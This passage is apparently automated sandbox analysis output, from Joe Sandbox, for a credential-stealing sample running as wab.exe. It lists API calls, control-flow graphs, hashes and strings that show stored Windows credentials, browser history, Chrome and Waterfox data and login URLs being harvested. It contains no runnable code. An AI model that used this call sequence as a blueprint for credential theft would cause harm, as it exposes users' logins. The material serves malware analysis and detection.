                                                  • memset.MSVCRT ref: 0040B756
                                                  • memset.MSVCRT ref: 0040B7F5
                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                  • memset.MSVCRT ref: 0040B851
                                                  • memset.MSVCRT ref: 0040B8CA
                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                  • memset.MSVCRT ref: 0040BB53
                                                  • memcpy.MSVCRT ref: 0040BB66
                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                  • String ID: chp$v10
                                                  • API String ID: 170802307-2783969131
                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                  • String ID:
                                                  • API String ID: 3715365532-3916222277
                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                  • String ID: bhv
                                                  • API String ID: 327780389-2689659898
                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2941347001-70141382
                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 644 44671d-446726 641->644 643 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->643 653 4467ac-4467b7 __setusermatherr 643->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 643->654 646 446747-44674b 644->646 647 446728-44672d 644->647 646->642 649 44674d-44674f 646->649 647->642 648 446734-44673b 647->648 648->642 651 44673d-446745 648->651 652 446755-446758 649->652 651->652 652->643 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 662 446834-446838 660->662 663 44683a-44683e 660->663 665 446845-44684b 661->665 666 446872-446877 661->666 662->660 662->663 663->665 667 446840-446842 663->667 669 446853-446864 GetStartupInfoW 665->669 670 44684d-446851 665->670 666->661 667->665 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                  • String ID:
                                                  • API String ID: 2827331108-0
                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • wcschr.MSVCRT ref: 0040C324
                                                  • wcschr.MSVCRT ref: 0040C344
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                  • String ID: visited:
                                                  • API String ID: 1157525455-1702587658
                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                  • API String ID: 3883404497-2982631422
                                                  • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                  • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040BC75
                                                  • memset.MSVCRT ref: 0040BC8C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                  • memcpy.MSVCRT ref: 0040BD2B
                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                  • String ID:
                                                  • API String ID: 509814883-3916222277
                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile$??3@ErrorLast
                                                  • String ID: |A
                                                  • API String ID: 1407640353-1717621600
                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                  • String ID: r!A
                                                  • API String ID: 2791114272-628097481
                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                  • wcslen.MSVCRT ref: 0040C82C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                  • API String ID: 62308376-4196376884
                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                  • wcslen.MSVCRT ref: 0040BE06
                                                  • _wcsncoll.MSVCRT ref: 0040BE38
                                                  • memset.MSVCRT ref: 0040BE91
                                                  • memcpy.MSVCRT ref: 0040BEB2
                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                  • wcschr.MSVCRT ref: 0040BF24
                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                  • String ID:
                                                  • API String ID: 3191383707-0
                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403CBF
                                                  • memset.MSVCRT ref: 00403CD4
                                                  • memset.MSVCRT ref: 00403CE9
                                                  • memset.MSVCRT ref: 00403CFE
                                                  • memset.MSVCRT ref: 00403D13
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403DDA
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Waterfox$Waterfox\Profiles
                                                  • API String ID: 3527940856-11920434
                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
